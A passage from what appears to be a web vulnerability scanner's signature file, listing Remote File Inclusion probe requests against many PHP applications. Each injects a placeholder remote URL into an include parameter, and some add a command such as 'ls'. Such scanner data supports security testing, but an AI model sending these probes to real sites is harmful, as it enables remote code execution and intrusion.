list.\",\"\",\"\"\n\"003854\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/?_CONFIG[files][functions_page]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003855\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/?npage=-1&content_dir=@RFIURL%00&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003856\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/?npage=1&content_dir=@RFIURL%00&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003857\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/?show=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003858\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/A-Blog/navigation/donation.php?navigation_start=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003859\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/A-Blog/navigation/latestnews.php?navigation_start=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003860\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/A-Blog/navigation/links.php?navigation_start=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003861\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/A-Blog/navigation/search.php?navigation_end=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003862\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/A-Blog/sources/myaccount.php?open_box=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003863\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ACGVnews/header.php?PathNews=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003864\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ATutor/documentation/common/frame_toc.php?section=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003865\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ATutor/documentation/common/search.php?section=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003866\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ATutor/documentation/common/vitals.inc.php?req_lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003867\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ATutor/include/classes/module/module.class.php?row[dir_name]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003868\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003869\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003870\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Administration/Includes/configureText.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003871\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Administration/Includes/contentHome.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003872\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Administration/Includes/deleteContent.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003873\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Administration/Includes/deleteUser.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003874\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Administration/Includes/userHome.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003875\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003876\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003877\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BE_config.php?_PSL[classdir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003878\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BPNEWS/bn_smrep1.php?bnrep=@RFIURL?&\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003879\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Base/Application.php?pear_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003880\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Bcwb_PATH/dcontent/default.css.php?root_path_admin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003881\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Bcwb_PATH/include/startup.inc.php?root_path_admin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003882\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Bcwb_PATH/system/default.css.php?root_path_admin=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003883\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Beautifier/Core.php?BEAUT_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003884\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003885\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003886\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003887\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003888\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003889\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003890\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003891\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003892\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003893\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003894\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003895\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003896\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003897\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003898\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003899\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003900\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003901\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003902\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003903\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003904\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003905\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003906\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003907\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003908\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003909\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003910\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003911\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003912\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003913\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003914\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003915\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003916\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003917\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003918\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003919\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003920\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003921\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003922\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003923\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003924\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003925\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003926\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003927\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003928\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003929\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003930\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003931\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003932\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003933\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003934\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003935\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003936\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003937\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003938\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003939\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003940\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003941\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003942\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003943\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003944\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003945\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/CheckUpload.php?Language=@RFIURL&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003946\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/backend_search.php?contenido_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003947\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003948\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003949\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003950\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003951\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003952\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003953\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003954\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003955\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003956\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003957\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003958\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003959\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"003960\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/CoupleDB.php?Parametre=0&DataDirectory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 